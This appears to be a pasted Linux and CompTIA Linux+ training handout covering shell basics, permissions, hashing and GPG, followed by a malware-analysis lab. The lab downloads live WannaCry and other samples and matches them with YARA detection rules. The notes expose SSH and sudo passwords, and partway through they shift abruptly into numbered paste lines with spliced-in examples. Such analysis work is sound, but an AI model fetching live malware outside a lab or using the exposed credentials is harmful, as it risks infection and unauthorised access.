joemccray

2020 Intro to Linux & Comptia Linux+ Exam Prep

Oct 21st, 2019
##############################
# Day 1: Linux Fundamentals #
##############################



#####################################################
# 2020 Intro to Linux & Comptia Linux+ Exam Prep #
# By Joe McCray #
#####################################################

- Here is a good set of slides for getting started with Linux:
http://www.slideshare.net/olafusimichael/linux-training-24086319


- Here is a good tutorial that you should complete before doing the labs below:
http://linuxsurvival.com/linux-tutorial-introduction/


- I prefer to use PuTTY to SSH into my Linux host.
- You can download PuTTY from here:
- http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe

Here is the information to put into PuTTY:

Host Name: 149.28.201.171
protocol: ssh
port: 22
username: linuxtraining
password: linux!training123!


########################
# Basic Linux Commands #
########################

---------------------------Type This-----------------------------------
cd ~

pwd

whereis pwd

which pwd

sudo find / -name pwd

/bin/pwd

cd ~/students/

mkdir yourname <---- replace 'yourname' with your first name in lowercase with no spaces or special characters please

cd yourname <---- replace 'yourname' with your first name in lowercase with no spaces or special characters please

touch one two three

ls -l t (without pressing the Enter key, press the Tab key twice. What happens?)

h (and again without pressing the Enter key, press the Tab key twice. What happens?)

Press the 'Up arrow key' (What happens?)

Press 'Ctrl-A' (What happens?)

ls

clear (What happens?)

echo one > one

cat one (What happens?)

man cat (What happens?)
q

cat two

cat one > two

cat two

cat one two > three

cat three

echo four >> three

cat three (What happens?)

wc -l three

man wc
q

info wc
q

cat three | grep four

cat three | grep one

man grep
q

man ps
q

ps

ps aux

ps aux | less

Press the 'Up arrow key' (What happens?)

Press the 'Down arrow key' (What happens?)
q

top
q
-----------------------------------------------------------------------


#########
# Files #
#########
---------------------------Type This-----------------------------------
cd ~

pwd

cd ~/students/yourname/

pwd

ls

mkdir LinuxBasics

cd LinuxBasics

pwd

ls

mkdir files

touch one two three

cp one files/

ls files/

cd files/

cp ../two .

ls

cp ../three .

ls

tar cvf files.tar *

ls

gzip files.tar

ls

rm -rf one two three

ls

tar -zxvf files.tar.gz

rm -rf files.tar.gz

zip data *

unzip -l data.zip

mkdir /tmp/yourname/

unzip data.zip -d /tmp/yourname/
-----------------------------------------------------------------------


############
# VIM Demo #
############
---------------------------Type This-----------------------------------
cd ~/students/yourname/LinuxBasics

mkdir vimlesson

cd vimlesson

vi lesson1.sh

i (press "i" to get into INSERT mode and then paste in the lines below)

#!/bin/bash

echo "This is my first time using vi to create a shell script"
echo " "
echo " "
echo " "
sleep 5
echo "Ok, now let's clear the screen"
sleep 3
clear


---------------don't put this line in your script----------------------------

ESC (press the ESC key to get out of INSERT mode)

[SHIFT+:] (press SHIFT and the : key at the same time; you should see a : in the bottom left corner of the screen)

wq (typing "wq" immediately after SHIFT+: will save and exit: w for write, q for quit)



vi lesson1.sh

[SHIFT+:] (press SHIFT and the : key at the same time; you should see a : in the bottom left corner of the screen)

set number (typing "set number" immediately after SHIFT+: will add line numbers to vim)

wq (typing "wq" immediately after SHIFT+: will save and exit: w for write, q for quit)



vi lesson1.sh

[SHIFT+:] (press SHIFT and the : key at the same time; you should see a : in the bottom left corner of the screen)

set number (typing "set number" immediately after SHIFT+: will add line numbers to vim)

[SHIFT+:] (press SHIFT and the : key at the same time; you should see a : in the bottom left corner of the screen)

/echo (typing "/echo" immediately after SHIFT+: will search the file for the word echo)

[SHIFT+:] (press SHIFT and the : key at the same time; you should see a : in the bottom left corner of the screen)

wq (typing "wq" immediately after SHIFT+: will save and exit: w for write, q for quit)



vi lesson1.sh

[SHIFT+:] (press SHIFT and the : key at the same time; you should see a : in the bottom left corner of the screen)

set number (typing "set number" immediately after SHIFT+: will add line numbers to vim)

[SHIFT+:] (press SHIFT and the : key at the same time; you should see a : in the bottom left corner of the screen)

4 (typing "4" immediately after SHIFT+: will take you to line number 4)

[SHIFT+:] (press SHIFT and the : key at the same time; you should see a : in the bottom left corner of the screen)

wq (typing "wq" immediately after SHIFT+: will save and exit: w for write, q for quit)



vi lesson1.sh

[SHIFT+:] (press SHIFT and the : key at the same time; you should see a : in the bottom left corner of the screen)

set number (typing "set number" immediately after SHIFT+: will add line numbers to vim)

[SHIFT+:] (press SHIFT and the : key at the same time; you should see a : in the bottom left corner of the screen)

4 (typing "4" immediately after SHIFT+: will take you to line number 4)

dd (typing "dd" will delete the line that you are on)

[SHIFT+:] (press SHIFT and the : key at the same time; you should see a : in the bottom left corner of the screen)

wq (typing "wq" immediately after SHIFT+: will save and exit: w for write, q for quit)



vi lesson1.sh

[SHIFT+:] (press SHIFT and the : key at the same time; you should see a : in the bottom left corner of the screen)

set number (typing "set number" immediately after SHIFT+: will add line numbers to vim)

[SHIFT+:] (press SHIFT and the : key at the same time; you should see a : in the bottom left corner of the screen)

4 (typing "4" immediately after SHIFT+: will take you to line number 4)

dd (typing "dd" will delete the line that you are on)

[SHIFT+:] (press SHIFT and the : key at the same time; you should see a : in the bottom left corner of the screen)

syntax on (typing "syntax on" immediately after SHIFT+: will turn on syntax highlighting)

[SHIFT+:] (press SHIFT and the : key at the same time; you should see a : in the bottom left corner of the screen)

set tabstop=5 (typing "set tabstop=5" immediately after SHIFT+: will set your tabs to 5 spaces)

[SHIFT+:] (press SHIFT and the : key at the same time; you should see a : in the bottom left corner of the screen)

wq (typing "wq" immediately after SHIFT+: will save and exit: w for write, q for quit)



vi .vimrc
i (press "i" to get into INSERT mode and then paste in the lines below)

set number
syntax on
set tabstop=5

ESC (press the ESC key to get out of INSERT mode)

[SHIFT+:] (press SHIFT and the : key at the same time; you should see a : in the bottom left corner of the screen)

wq (typing "wq" immediately after SHIFT+: will save and exit: w for write, q for quit)



vi lesson1.sh

[SHIFT+:] (press SHIFT and the : key at the same time; you should see a : in the bottom left corner of the screen)

echo $MYVIMRC (typing "echo $MYVIMRC" immediately after SHIFT+: will display the path to your new .vimrc file)

[SHIFT+:] (press SHIFT and the : key at the same time; you should see a : in the bottom left corner of the screen)

wq (typing "wq" immediately after SHIFT+: will save and exit: w for write, q for quit)
-----------------------------------------------------------------------



###############
# Permissions #
###############
---------------------------Type This-----------------------------------
cd ~/students/yourname/LinuxBasics

ls -l one
-----------------------------------------------------------------------
We can determine a lot from examining the results of this command. The file "one" is owned by user "me".
The user "me" has the right to read and write this file.
The file is owned by the group "me". Members of the group "me" can also read and write this file.
Everybody else can read this file.


---------------------------Type This-----------------------------------
ls -l /bin/bash
-----------------------------------------------------------------------

Here we can see:

The file "/bin/bash" is owned by user "root". The superuser has the right to read, write, and execute this file.
The file is owned by the group "root". Members of the group "root" can also read and execute this file. Everybody else can read and execute this file.


The next command you need to know is "chmod". Each permission triplet (owner, group, others) maps to three bits:
rwx rwx rwx = 111 111 111
rw- rw- rw- = 110 110 110
rwx --- --- = 111 000 000

and so on...

rwx = 111 in binary = 7
rw- = 110 in binary = 6
r-x = 101 in binary = 5
r-- = 100 in binary = 4


---------------------------Type This-----------------------------------
ls -l one

chmod 600 one

ls -l one

sudo useradd yourname
aegisweaponssystem

sudo passwd yourname
P@$$w0rd321
P@$$w0rd321

sudo chown testuser one
aegisweaponssystem

ls -l one

sudo chgrp testuser one
aegisweaponssystem

ls -l one

id

su testuser
P@$$w0rd321
-----------------------------------------------------------------------

Here is a table of numbers that covers all the common settings. The ones beginning with "7" are used with programs (since they enable execution) and the rest are for other kinds of files.

Value Meaning
777 (rwxrwxrwx) No restrictions on permissions. Anybody may do anything. Generally not a desirable setting.
755 (rwxr-xr-x) The file's owner may read, write, and execute the file. All others may read and execute the file. This setting is common for programs that are used by all users.
700 (rwx------) The file's owner may read, write, and execute the file. Nobody else has any rights. This setting is useful for programs that only the owner may use and must be kept private from others.
666 (rw-rw-rw-) All users may read and write the file.
644 (rw-r--r--) The owner may read and write a file, while all others may only read the file. A common setting for data files that everybody may read, but only the owner may change.
600 (rw-------) The owner may read and write a file. All others have no rights. A common setting for data files that the owner wants to keep private.


Directory permissions
---------------------
The chmod command can also be used to control the access permissions for directories. In most ways, the permissions scheme for directories works the same way as it does for files. However, the execute permission is used in a different way: on a directory it controls whether the directory can be entered and the files inside it reached. Here are some useful settings for directories:

Value Meaning
777 (rwxrwxrwx) No restrictions on permissions. Anybody may list files, create new files in the directory and delete files in the directory. Generally not a good setting.
755 (rwxr-xr-x) The directory owner has full access. All others may list the directory, but cannot create files nor delete them. This setting is common for directories that you wish to share with other users.
700 (rwx------) The directory owner has full access. Nobody else has any rights. This setting is useful for directories that only the owner may use and must be kept private from others.

######################
# Process Management #
######################
---------------------------Type This-----------------------------------
top
q

htop
q

ps

ps aux

ps -A

ps -A | less

ps axjf

pstree

pstree -A

pgrep bash

pgrep init

ps aux | grep apache
-----------------------------------------------------------------------


You can list all of the signals that kill can send by typing:
---------------------------Type This-----------------------------------
kill -l

sudo kill -HUP pid_of_apache

The pkill command works in almost exactly the same way as kill, but it operates on a process name instead:

pkill -9 ping
The above command is the equivalent of:

kill -9 `pgrep ping`
-----------------------------------------------------------------------


################
# Hashing Demo #
################
---------------------------Type This-----------------------------------
cd ~/students/yourname/LinuxBasics

mkdir hashdemo

cd hashdemo

echo test > test.txt

cat test.txt

md5sum test.txt

echo hello >> test.txt

cat test.txt

md5sum test.txt

echo test2 > test2.txt

cat test2.txt

sha256sum test2.txt

echo hello >> test2.txt

cat test2.txt

sha256sum test2.txt

cd ..
-----------------------------------------------------------------------
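As an added example (my own code, not from the course), this turns the hashing demo into an integrity check: record the SHA-256 digest of each file in a directory in a manifest, then use sha256sum -c to report which files changed. The scratch directory and function names are constructed for the example; the digest printed for the constructed test.txt is the SHA-256 of the single line "test".

```shell
#!/bin/sh
# Added example: from "the hash changes when the file changes" to an integrity check.
# Function names and the scratch directory are my own; nothing here is from the course.

# SHA-256 digest of one file, without the trailing file name sha256sum prints.
sha256_of() {
    sha256sum -- "$1" | awk '{print $1}'
}

# Baseline: hash every regular file in a directory into a hidden manifest
# (one "digest  name" line per file, the format sha256sum -c reads back).
make_manifest() {
    ( cd -- "$1" && sha256sum -- * > .manifest.sha256 )
}

# Verify: re-hash against the manifest and print only the names whose digest
# differs or whose file is gone. sha256sum -c emits "name: OK" or "name: FAILED";
# the summary it writes to stderr is discarded.
changed_files() {
    ( cd -- "$1" && sha256sum -c .manifest.sha256 2>/dev/null ) \
        | awk -F': ' '$2 != "OK" { print $1 }'
}

# Demonstration mirroring the lab: baseline test.txt and test2.txt, append
# "hello" to test.txt as the lab does, and see that only test.txt is reported.
demo() {
    d=$(mktemp -d)
    echo test  > "$d/test.txt"
    echo test2 > "$d/test2.txt"
    make_manifest "$d"
    printf 'baseline     sha256(test.txt) = %s\n' "$(sha256_of "$d/test.txt")"
    echo hello >> "$d/test.txt"
    printf 'after append sha256(test.txt) = %s\n' "$(sha256_of "$d/test.txt")"
    printf 'changed: %s\n' "$(changed_files "$d")"   # changed: test.txt
    rm -rf "$d"
}
demo
```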



#################################
# Symmetric Key Encryption Demo #
#################################
---------------------------Type This-----------------------------------
cd ~/students/yourname/LinuxBasics

mkdir gpgdemo

cd gpgdemo

echo test > test.txt

cat test.txt

gpg -c test.txt
password
password

ls | grep test

cat test.txt

cat test.txt.gpg

rm -rf test.txt

ls | grep test

gpg -o output.txt test.txt.gpg
P@$$w0rD!@#$P@$$w0rD!@#$

cat output.txt
-----------------------------------------------------------------------



#########################################################################################################################
# Asymmetric Key Encryption Demo #
# #
# Configure random number generator #
# https://www.howtoforge.com/helping-the-random-number-generator-to-gain-enough-entropy-with-rng-tools-debian-lenny #
#########################################################################################################################
---------------------------Type This-----------------------------------
cd ~/students/yourname/LinuxBasics/gpgdemo

echo hello > file1.txt

echo goodbye > file2.txt

echo green > file3.txt

echo blue > file4.txt

tar czf files.tar.gz *.txt

gpg --gen-key
1
1024
0
y
John Doe
john@doe.com
--blank comment--
O
P@$$w0rD!@#$P@$$w0rD!@#$
P@$$w0rD!@#$P@$$w0rD!@#$


gpg --armor --output file-enc-pubkey.txt --export 'John Doe'

cat file-enc-pubkey.txt

gpg --armor --output file-enc-privkey.asc --export-secret-keys 'John Doe'

cat file-enc-privkey.asc

gpg --encrypt --recipient 'John Doe' files.tar.gz

rm -rf files.tar.gz *.txt

ls

tar -zxvf files.tar.gz.gpg

gpg --output output.tar.gz --decrypt files.tar.gz.gpg
P@$$w0rD!@#$P@$$w0rD!@#$

tar -zxvf output.tar.gz

ls
-----------------------------------------------------------------------



##############################################
# Log Analysis with Linux command-line tools #
##############################################
- The following command-line executables are found on macOS as well as in most Linux distributions.

cat – prints the content of a file in the terminal window
grep – searches and filters based on patterns
awk – can split each row into fields and display only what is needed
sed – performs find-and-replace functions
sort – arranges output in an order
uniq – compares adjacent lines and can report, filter or provide a count of duplicates



##############
# Cisco Logs #
##############
---------------------------Type This-----------------------------------
cd ~/students/yourname/
mkdir security
cd security
mkdir log_analysis
cd log_analysis
wget http://45.63.104.73/cisco.log
-----------------------------------------------------------------------


AWK Basics
----------
- To quickly demonstrate the print feature in awk, we can instruct it to show only the 5th word of each line. Here we will print $5. Only the last 4 lines are being shown for brevity.
---------------------------Type This-----------------------------------
cat cisco.log | awk '{print $5}' | tail -n 4
-----------------------------------------------------------------------


- Looking at a large file would still produce a large amount of output. A more useful thing to do might be to output every entry found in "$5", group them together, count them, then sort them from the greatest to least number of occurrences. This can be done by piping the output through "sort", using "uniq -c" to count the like entries, then using "sort -rn" to sort it in reverse numeric order.
---------------------------Type This-----------------------------------
cat cisco.log | awk '{print $5}' | sort | uniq -c | sort -rn
-----------------------------------------------------------------------


- While that's sort of cool, it is obvious that we have some garbage in our output. Evidently we have a few lines that aren't conforming to the output we expect to see in $5. We can insert grep to filter the file prior to feeding it to awk. This ensures that we are at least looking at lines of text that contain a "facility-level-mnemonic" tag. (The pattern is quoted so the shell does not expand its * and [ ] as a filename glob.)
---------------------------Type This-----------------------------------
cat cisco.log | grep '%[a-zA-Z]*-[0-9]-[a-zA-Z]*' | awk '{print $5}' | sort | uniq -c | sort -rn
-----------------------------------------------------------------------


- Now that the output is cleaned up a bit, it is a good time to investigate some of the entries that appear most often. One way to see all occurrences is to use grep.
---------------------------Type This-----------------------------------
cat cisco.log | grep %LINEPROTO-5-UPDOWN:

cat cisco.log | grep %LINEPROTO-5-UPDOWN: | awk '{print $10}' | sort | uniq -c | sort -rn

cat cisco.log | grep %LINEPROTO-5-UPDOWN: | sed 's/,//g' | awk '{print $10}' | sort | uniq -c | sort -rn

cat cisco.log | grep %LINEPROTO-5-UPDOWN: | sed 's/,//g' | awk '{print $10 " changed to " $14}' | sort | uniq -c | sort -rn
-----------------------------------------------------------------------
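As an added example (my own code, not from the course, and not the real cisco.log), the constructed Cisco syslog lines below run the pipelines from this section so their results can be checked offline: one noise line shows the "garbage" that the grep filter removes, and the trailing comma on the interface name shows why the sed step is needed. The sample lines and function names are my own.

```shell
#!/bin/sh
# Added example: the awk/grep/sed/sort/uniq pipelines from this section, run
# against a small constructed Cisco syslog sample (not the course's cisco.log).
# Field layout: $1-$3 timestamp, $4 host, $5 %FACILITY-SEVERITY-MNEMONIC:, then the message.
CISCO_LOG=$(cat <<'EOF'
Oct 21 09:00:01 rtr1 %LINEPROTO-5-UPDOWN: Line protocol on Interface GigabitEthernet0/1, changed state to down
Oct 21 09:00:03 rtr1 %LINEPROTO-5-UPDOWN: Line protocol on Interface GigabitEthernet0/1, changed state to up
Oct 21 09:00:07 rtr1 %LINK-3-UPDOWN: Interface GigabitEthernet0/1, changed state to down
Oct 21 09:01:15 rtr2 %SEC-6-IPACCESSLOGP: list 101 denied tcp 10.0.0.9(4321) -> 10.0.0.1(23), 1 packet
Oct 21 09:02:00 rtr1 %LINEPROTO-5-UPDOWN: Line protocol on Interface GigabitEthernet0/2, changed state to down
Oct 21 09:02:30 rtr1 %SYS-5-CONFIG_I: Configured from console by admin on vty0 (10.0.0.5)
Oct 21 09:02:31 rtr1 last message repeated 2 times
EOF
)

# Helper: emit the sample one line at a time (stands in for "cat cisco.log").
log() { printf '%s\n' "$CISCO_LOG"; }

# Helper: "count value" with uniq -c's leading padding removed, so results compare cleanly.
ranked() { sort | uniq -c | sort -rn | awk '{ $1 = $1; print }'; }

# Second pipeline of the section: rank every $5 value. The "last message repeated"
# line puts the word "last" in $5, which is the garbage the section mentions.
rank_field5_raw() {
    log | awk '{print $5}' | ranked
}

# Third pipeline: keep only lines carrying a %FACILITY-LEVEL-MNEMONIC tag first.
# The pattern is quoted so the shell does not expand * and [ ] as a filename glob.
rank_field5_filtered() {
    log | grep '%[a-zA-Z]*-[0-9]-[a-zA-Z]*' | awk '{print $5}' | ranked
}

# Interface field without sed: $10 still carries the trailing comma ("GigabitEthernet0/1,").
interfaces_raw() {
    log | grep '%LINEPROTO-5-UPDOWN:' | awk '{print $10}' | ranked
}

# With sed stripping commas: interface and new state, counted per transition.
interface_transitions() {
    log | grep '%LINEPROTO-5-UPDOWN:' | sed 's/,//g' | awk '{print $10 " changed to " $14}' | ranked
}

echo '== $5 unfiltered =='; rank_field5_raw
echo '== $5 filtered =='; rank_field5_filtered
echo '== interface (no sed) =='; interfaces_raw
echo '== interface transitions =='; interface_transitions
```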




##################
# Day 1 Homework #
##################
Task Option 1: Linux Survival
-----------------------------
Do all of the exercises in Linux Survival (http://linuxsurvival.com/linux-tutorial-introduction/)
Create a Word document that contains the screenshots of the quizzes. NOTE: You must score a perfect 100 for all 4 quizzes.
Name the Word document 'YourFirstName-YourLastName-LinuxDay1-LinuxSurvival.docx' (ex: 'Joseph-McCray-LinuxDay1-LinuxSurvival.docx')
Email the document to me at joe-at-secureninja-dot-com before the start of class tomorrow


Task Option 2: Basic Shell Scripting
------------------------------------
Watch and do all of the exercises in the video https://www.youtube.com/watch?v=_n5ZegzieSQ
Create a Word document that contains the screenshots of the tasks performed in this video
Name the Word document 'YourFirstName-YourLastName-LinuxDay1-ShellScripting.docx' (ex: 'Joseph-McCray-LinuxDay1-ShellScripting.docx')
Email the document to me at joe-at-secureninja-dot-com before the start of class tomorrow



###########################
# Day 2: Malware Analysis #
###########################



################
# The Scenario #
################
You've come across a file that has been flagged by one of your security products (AV quarantine, HIPS, spam filter, web proxy, or digital forensics scripts). The fastest thing you can do is perform static analysis.



####################
# Malware Analysis #
####################


- After logging in, please open a terminal window and type the following commands:
---------------------------Type This-----------------------------------
cd ~/students/yourname/security/
mkdir malware_analysis
cd malware_analysis
-----------------------------------------------------------------------

- This is actual malware (remember to run it in a VM). The password to extract it is 'infected':

---------------------------Type This-----------------------------------
wget https://infosecaddicts-files.s3.amazonaws.com/malware-password-is-infected.zip --no-check-certificate
wget https://infosecaddicts-files.s3.amazonaws.com/analyse_malware.py --no-check-certificate
wget https://infosecaddicts-files.s3.amazonaws.com/wannacry.zip --no-check-certificate

unzip malware-password-is-infected.zip
infected

file malware.exe

mv malware.exe malware.pdf

file malware.pdf

mv malware.pdf malware.exe

hexdump -n 2 -C malware.exe
-----------------------------------------------------------------------


***What is '4d 5a' or 'MZ'***
Reference:
http://www.garykessler.net/library/file_sigs.html


---------------------------Type This-----------------------------------
objdump -x malware.exe

strings malware.exe

strings --all malware.exe | head -n 6

strings malware.exe | grep -i dll

strings malware.exe | grep -i library

strings malware.exe | grep -i reg

strings malware.exe | grep -i hkey

strings malware.exe | grep -i hku
-----------------------------------------------------------------------
- We didn't see anything like HKLM, HKCU or other registry-type stuff


---------------------------Type This-----------------------------------
strings malware.exe | grep -i irc

strings malware.exe | grep -i join

strings malware.exe | grep -i admin

strings malware.exe | grep -i list
-----------------------------------------------------------------------

- List of IRC commands: https://en.wikipedia.org/wiki/List_of_Internet_Relay_Chat_commands

---------------------------Type This-----------------------------------
vi analyse_malware.py

python analyse_malware.py malware.exe
-----------------------------------------------------------------------



- After logging in, please open a terminal window and type the following commands:
---------------------------Type This-----------------------------------
cd ~/students/yourname/security/malware_analysis

unzip wannacry.zip
infected

file wannacry.exe

mv wannacry.exe malware.pdf

file malware.pdf

mv malware.pdf wannacry.exe

hexdump -n 2 -C wannacry.exe
-----------------------------------------------------------------------


***What is '4d 5a' or 'MZ'***
Reference:
http://www.garykessler.net/library/file_sigs.html


---------------------------Type This-----------------------------------
objdump -x wannacry.exe

strings wannacry.exe

strings --all wannacry.exe | head -n 6

strings wannacry.exe | grep -i dll

strings wannacry.exe | grep -i library

strings wannacry.exe | grep -i reg

strings wannacry.exe | grep -i key

strings wannacry.exe | grep -i rsa

strings wannacry.exe | grep -i open

strings wannacry.exe | grep -i get

strings wannacry.exe | grep -i mutex

strings wannacry.exe | grep -i irc

strings wannacry.exe | grep -i join

strings wannacry.exe | grep -i admin

strings wannacry.exe | grep -i list
-----------------------------------------------------------------------


Hmmmmm.......what's the latest thing in the news - oh yeah "WannaCry"

Quick Google search for "wannacry ransomware analysis"


Reference
https://securingtomorrow.mcafee.com/executive-perspectives/analysis-wannacry-ransomware-outbreak/

- Yara Rule -

Strings:
$s1 = "Ooops, your files have been encrypted!" wide ascii nocase
$s2 = "Wanna Decryptor" wide ascii nocase
$s3 = ".wcry" wide ascii nocase
$s4 = "WANNACRY" wide ascii nocase
$s5 = "WANACRY!" wide ascii nocase
$s7 = "icacls . /grant Everyone:F /T /C /Q" wide ascii nocase


Ok, let's look for the individual strings in our file

---------------------------Type This-----------------------------------
strings wannacry.exe | grep -i ooops

strings wannacry.exe | grep -i wanna

strings wannacry.exe | grep -i wcry

strings wannacry.exe | grep -i wannacry

strings wannacry.exe | grep -i wanacry **** Matches $s5, hmmm.....
-----------------------------------------------------------------------


################################
# Good references for WannaCry #
################################

References:

https://gist.github.com/rain-1/989428fa5504f378b993ee6efbc0b168
https://securingtomorrow.mcafee.com/executive-perspectives/analysis-wannacry-ransomware-outbreak/
https://joesecurity.org/reports/report-db349b97c37d22f5ea1d1841e3c89eb4.html



####################################
# Tired of GREP - let's try Python #
####################################
Decided to make my own script for this kind of stuff in the future. I

Reference 1:
https://infosecaddicts-files.s3.amazonaws.com/analyse_malware.py

This is a really good script for the basics of static analysis.

Reference 2:
https://joesecurity.org/reports/report-db349b97c37d22f5ea1d1841e3c89eb4.html

This is really good for showing some good signatures to add to the Python script.


Here is my own script using the signatures (started this yesterday, but still needs work):
https://pastebin.com/guxzCBmP


---------------------------Type This-----------------------------------
wget https://pastebin.com/raw/guxzCBmP

mv guxzCBmP am.py

vi am.py

python am.py wannacry.exe
-----------------------------------------------------------------------



  1026. ##############
  1027. # Yara Ninja #
  1028. ##############
  1029. Hmmmmm.......what's the latest thing in the news - oh yeah "WannaCry"
  1030.  
  1031. Quick Google search for "wannacry ransomware analysis"
  1032.  
  1033.  
  1034. Reference
  1035. https://www.mcafee.com/blogs/other-blogs/executive-perspectives/analysis-wannacry-ransomware-outbreak/
  1036.  
  1037.  
  1038.  
  1074.  
  1075.  
  1076.  
  1077.  
  1078. Let's see if we can get yara working.
  1079. ---------------------------Type This-----------------------------------
  1080. cd ~/students/yourname/security/malware_analysis
  1081.  
  1082. mkdir quick_yara
  1083.  
  1084. cd quick_yara
  1085. wget http://45.63.104.73/wannacry.zip
  1086.  
  1087. unzip wannacry.zip
  1088. **** password is infected ****
  1089. -----------------------------------------------------------------------
  1090.  
  1091.  
  1092.  
  1093.  
  1094.  
  1095. ---------------------------Type This-----------------------------------
  1096.  
  1097. nano wannacry_1.yar
  1098.  
  1099. ---------------------------Paste This-----------------------------------
  1100. rule wannacry_1 : ransom
  1101. {
  1102. meta:
  1103. author = "Joshua Cannell"
  1104. description = "WannaCry Ransomware strings"
  1105. weight = 100
  1106. date = "2017-05-12"
  1107.  
  1108. strings:
  1109. $s1 = "Ooops, your files have been encrypted!" wide ascii nocase
  1110. $s2 = "Wanna Decryptor" wide ascii nocase
  1111. $s3 = ".wcry" wide ascii nocase
  1112. $s4 = "WANNACRY" wide ascii nocase
  1113. $s5 = "WANACRY!" wide ascii nocase
  1114. $s7 = "icacls . /grant Everyone:F /T /C /Q" wide ascii nocase
  1115.  
  1116. condition:
  1117. any of them
  1118. }
  1119.  
  1120. ----------------------------------------------------------------------------
  1121.  
  1122.  
  1123.  
  1124.  
  1125.  
  1126. ---------------------------Type This-----------------------------------
  1127.  
  1128. yara wannacry_1.yar wannacry.exe
  1129.  
  1130. -----------------------------------------------------------------------
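Added example (not part of the course notes or of Yara itself): a small Python emulation of what the `wide ascii nocase` modifiers in wannacry_1 make Yara look for, so you can see why the rule fires on a file that stores "WANACRY!" as UTF-16LE or the ransom note in a different case. SAMPLE and CLEAN are constructed byte strings, not real WannaCry data.

```python
"""Emulate Yara's `wide ascii nocase` string modifiers in plain Python.

Added example, not part of the course notes or of Yara: it shows why
rule wannacry_1 fires even when a sample stores "WANACRY!" as UTF-16LE
(the `wide` form) or the ransom note in a different case (`nocase`).
SAMPLE and CLEAN below are constructed byte strings, not real malware.
"""
import re

# The strings from rule wannacry_1 above, each with its modifiers.
WANNACRY_1 = {
    "$s1": ("Ooops, your files have been encrypted!", {"wide", "ascii", "nocase"}),
    "$s2": ("Wanna Decryptor", {"wide", "ascii", "nocase"}),
    "$s3": (".wcry", {"wide", "ascii", "nocase"}),
    "$s4": ("WANNACRY", {"wide", "ascii", "nocase"}),
    "$s5": ("WANACRY!", {"wide", "ascii", "nocase"}),
    "$s7": ("icacls . /grant Everyone:F /T /C /Q", {"wide", "ascii", "nocase"}),
}


def compile_string(text, modifiers):
    """Build one bytes regex matching every encoding the modifiers allow.

    ascii  -> the literal bytes of the string
    wide   -> each character followed by a NUL byte (UTF-16LE)
    nocase -> case-insensitive comparison
    Yara defaults to ascii when neither ascii nor wide is given.
    """
    forms = []
    if "ascii" in modifiers or "wide" not in modifiers:
        forms.append(re.escape(text.encode("ascii")))
    if "wide" in modifiers:
        forms.append(re.escape(text.encode("utf-16-le")))
    flags = re.IGNORECASE if "nocase" in modifiers else 0
    return re.compile(b"|".join(forms), flags)


def scan(data, rule_strings=WANNACRY_1):
    """Return {string name: offset of first hit} for strings found in data."""
    hits = {}
    for name, (text, mods) in rule_strings.items():
        m = compile_string(text, mods).search(data)
        if m:
            hits[name] = m.start()
    return hits


def any_of_them(data, rule_strings=WANNACRY_1):
    """Yara condition `any of them`: true when at least one string matched."""
    return bool(scan(data, rule_strings))


# Constructed stand-in for a scanned file (not WannaCry bytes): a fake
# header, "WANACRY!" in UTF-16LE, then the ransom note in mixed case.
SAMPLE = (
    b"MZ\x90\x00" + b"\x00" * 12
    + "WANACRY!".encode("utf-16-le")
    + b"\x00" * 8
    + b"ooops, your FILES have been encrypted!"
    + b"\x00" * 8
    + b"unrelated text"
)
CLEAN = b"MZ\x90\x00" + b"nothing to see here" + b"\x00" * 16

if __name__ == "__main__":
    print(scan(SAMPLE))  # {'$s1': 40, '$s5': 16}
    # Without `wide` the UTF-16LE copy of WANACRY! is invisible, which is
    # why a plain `strings | grep` can miss what a wide-enabled rule catches.
    print(compile_string("WANACRY!", {"ascii"}).search(SAMPLE))  # None
```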
  1131.  
  1132.  
  1133.  
  1134.  
  1135.  
  1136. ---------------------------Type This-----------------------------------
  1137.  
  1138. nano wannacry_2.yar
  1139.  
  1140. ---------------------------Paste This-----------------------------------
  1141. rule wannacry_2{
  1142. meta:
  1143. author = "Harold Ogden"
  1144. description = "WannaCry Ransomware Strings"
  1145. date = "2017-05-12"
  1146. weight = 100
  1147.  
  1148. strings:
  1149. $string1 = "msg/m_bulgarian.wnry"
  1150. $string2 = "msg/m_chinese (simplified).wnry"
  1151. $string3 = "msg/m_chinese (traditional).wnry"
  1152. $string4 = "msg/m_croatian.wnry"
  1153. $string5 = "msg/m_czech.wnry"
  1154. $string6 = "msg/m_danish.wnry"
  1155. $string7 = "msg/m_dutch.wnry"
  1156. $string8 = "msg/m_english.wnry"
  1157. $string9 = "msg/m_filipino.wnry"
  1158. $string10 = "msg/m_finnish.wnry"
  1159. $string11 = "msg/m_french.wnry"
  1160. $string12 = "msg/m_german.wnry"
  1161. $string13 = "msg/m_greek.wnry"
  1162. $string14 = "msg/m_indonesian.wnry"
  1163. $string15 = "msg/m_italian.wnry"
  1164. $string16 = "msg/m_japanese.wnry"
  1165. $string17 = "msg/m_korean.wnry"
  1166. $string18 = "msg/m_latvian.wnry"
  1167. $string19 = "msg/m_norwegian.wnry"
  1168. $string20 = "msg/m_polish.wnry"
  1169. $string21 = "msg/m_portuguese.wnry"
  1170. $string22 = "msg/m_romanian.wnry"
  1171. $string23 = "msg/m_russian.wnry"
  1172. $string24 = "msg/m_slovak.wnry"
  1173. $string25 = "msg/m_spanish.wnry"
  1174. $string26 = "msg/m_swedish.wnry"
  1175. $string27 = "msg/m_turkish.wnry"
  1176. $string28 = "msg/m_vietnamese.wnry"
  1177.  
  1178.  
  1179. condition:
  1180. any of ($string*)
  1181. }
  1182. ----------------------------------------------------------------------------
  1183.  
  1184.  
  1185.  
  1186.  
  1187.  
  1188.  
  1189.  
  1190.  
  1191. ---------------------------Type This-----------------------------------
  1192.  
  1193. yara wannacry_2.yar wannacry.exe
  1194.  
  1195. -----------------------------------------------------------------------
  1196.  
  1197.  
  1198.  
  1199. ---------------------------Type This-----------------------------------
  1200. cd ~/students/yourname/security/malware_analysis/quick_yara
  1201.  
  1202. git clone https://github.com/Yara-Rules/rules.git
  1203.  
  1204. cd rules/
  1205.  
  1206. ./index_gen.sh
  1207.  
  1208. ls
  1209.  
  1210. cd malware/
  1211.  
  1212. ls | grep -i ransom
  1213.  
  1214. ls | grep -i rat
  1215.  
  1216. ls | grep -i toolkit
  1217.  
  1218. ls | grep -i apt
  1219.  
  1220. cd ..
  1221.  
  1222. cd capabilities/
  1223.  
  1224. ls
  1225.  
  1226. cat capabilities.yar
  1227.  
  1228. cd ..
  1229.  
  1230. cd cve_rules/
  1231.  
  1232. ls
  1233.  
  1234. cd ..
  1235.  
  1236. ./index_gen.sh
  1237.  
  1238. cd ..
  1239.  
